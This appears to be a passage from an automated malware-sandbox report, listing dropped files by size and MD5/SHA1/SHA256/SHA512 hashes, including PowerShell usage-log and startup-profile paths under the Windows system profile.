  SHA256: d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
  SHA512: 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

- Filesize: 6.3MB
  MD5: 79283500138b064632c294cabf8a5297
  SHA1: 2fc92733892e91fd09266917fc31e25c081ac60a
  SHA256: 4fed1d7c5efc1db3110a572ef50ddb4cc1ee4b1d7fcf169aed264f9c50cc3eed
  SHA512: 3bd3f462a917c736daf505e767e1de1acf9311d0602e4cc379a19189f3d15600441d6aa7ba64cf232cd8b44ebe1b60fe2bc3f3fb981564fa9139fe0f3d6f54ce

- Filesize: 6.3MB
  MD5: 79283500138b064632c294cabf8a5297
  SHA1: 2fc92733892e91fd09266917fc31e25c081ac60a
  SHA256: 4fed1d7c5efc1db3110a572ef50ddb4cc1ee4b1d7fcf169aed264f9c50cc3eed
  SHA512: 3bd3f462a917c736daf505e767e1de1acf9311d0602e4cc379a19189f3d15600441d6aa7ba64cf232cd8b44ebe1b60fe2bc3f3fb981564fa9139fe0f3d6f54ce

- Filesize: 6.8MB
  MD5: 2ed82896a6b7652fa072bb4215c6c995
  SHA1: 3da759219e664fc52fb90ebe5de4c936b5a2c2c8
  SHA256: 39518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
  SHA512: f48d7324b2b85a55d31115e7607decac91051d9361d656a5c3bcb2cbb01cd8b5fcedf385aad6f1c3f1eb0fa21e11f06c91665f3ae531281cc09862bf31d458c3

- Filesize: 6.8MB
  MD5: 2ed82896a6b7652fa072bb4215c6c995
  SHA1: 3da759219e664fc52fb90ebe5de4c936b5a2c2c8
  SHA256: 39518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
  SHA512: f48d7324b2b85a55d31115e7607decac91051d9361d656a5c3bcb2cbb01cd8b5fcedf385aad6f1c3f1eb0fa21e11f06c91665f3ae531281cc09862bf31d458c3

- Filesize: 6.8MB
  MD5: 2ed82896a6b7652fa072bb4215c6c995
  SHA1: 3da759219e664fc52fb90ebe5de4c936b5a2c2c8
  SHA256: 39518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
  SHA512: f48d7324b2b85a55d31115e7607decac91051d9361d656a5c3bcb2cbb01cd8b5fcedf385aad6f1c3f1eb0fa21e11f06c91665f3ae531281cc09862bf31d458c3

- Filesize: 6.8MB
  MD5: 2ed82896a6b7652fa072bb4215c6c995
  SHA1: 3da759219e664fc52fb90ebe5de4c936b5a2c2c8
  SHA256: 39518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
  SHA512: f48d7324b2b85a55d31115e7607decac91051d9361d656a5c3bcb2cbb01cd8b5fcedf385aad6f1c3f1eb0fa21e11f06c91665f3ae531281cc09862bf31d458c3

- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 1KB
  MD5: 33b19d75aa77114216dbc23f43b195e3
  SHA1: 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
  SHA256: b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
  SHA512: 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 11KB
  MD5: abc12cdc34d2dbc7e3cd0db89ccff22e
  SHA1: 1fe1c976c345c68f20f640f227ca9e360088c1ba
  SHA256: 1df01bdbe1a71c8f4e554b14df5aba1547acc35b285b219b45d17b6512aa79cd
  SHA512: 06a38fd920e2e2b7a8fd9694f446f0095a51fc21a3f08b0fc908e7af10c04ed9565eaefa814f8f1d37c1832e4c39ef8b0434e9aa9e614146823c723256a240d8

- Filesize: 6.2MB
  MD5: 442ac54c83d5cf8bbd2ea0e6c4c0e927
  SHA1: 68467575374102329790ede1223881b3a7fd12c6
  SHA256: 8a0c62bf9b50047f1a24f2d6370691b93c837868b2f393c698ee2e8ad5764279
  SHA512: 863f51f94cd12dccfa4769b69f61e9c6a1338462f270316fe9660eef992231ba17d40d23ce6eb9de4da428915deb20beff8e6d502bc1a37c6f6f871ec9384535

- Filesize: 6.2MB
  MD5: 442ac54c83d5cf8bbd2ea0e6c4c0e927
  SHA1: 68467575374102329790ede1223881b3a7fd12c6
  SHA256: 8a0c62bf9b50047f1a24f2d6370691b93c837868b2f393c698ee2e8ad5764279
  SHA512: 863f51f94cd12dccfa4769b69f61e9c6a1338462f270316fe9660eef992231ba17d40d23ce6eb9de4da428915deb20beff8e6d502bc1a37c6f6f871ec9384535

- Filesize: 6.8MB
  MD5: 2ed82896a6b7652fa072bb4215c6c995
  SHA1: 3da759219e664fc52fb90ebe5de4c936b5a2c2c8
  SHA256: 39518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
  SHA512: f48d7324b2b85a55d31115e7607decac91051d9361d656a5c3bcb2cbb01cd8b5fcedf385aad6f1c3f1eb0fa21e11f06c91665f3ae531281cc09862bf31d458c3

- Filesize: 6.8MB
  MD5: 2ed82896a6b7652fa072bb4215c6c995
  SHA1: 3da759219e664fc52fb90ebe5de4c936b5a2c2c8
  SHA256: 39518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
  SHA512: f48d7324b2b85a55d31115e7607decac91051d9361d656a5c3bcb2cbb01cd8b5fcedf385aad6f1c3f1eb0fa21e11f06c91665f3ae531281cc09862bf31d458c3

- Filesize: 5KB
  MD5: 8c6eb21cc51a5332c73240ecc076b4eb
  SHA1: 14c933f6fca3b861a76dd5bc6aaa8403097937ea
  SHA256: e1fd566dc47d7f78298e29e5226dd1a5d01a786a6203d53c94753acf5d3aebaa
  SHA512: ee170df1bebc41bf63ddb9408fe6c96e251546c0002b55fce8cf8b9058a104fde0123c1eeaadb761060ba1ac0f6e68c38d6f8bc492f6609c7de1120bf1ea0769

- Filesize: 268B
  MD5: a62ce44a33f1c05fc2d340ea0ca118a4
  SHA1: 1f03eb4716015528f3de7f7674532c1345b2717d
  SHA256: 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
  SHA512: 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732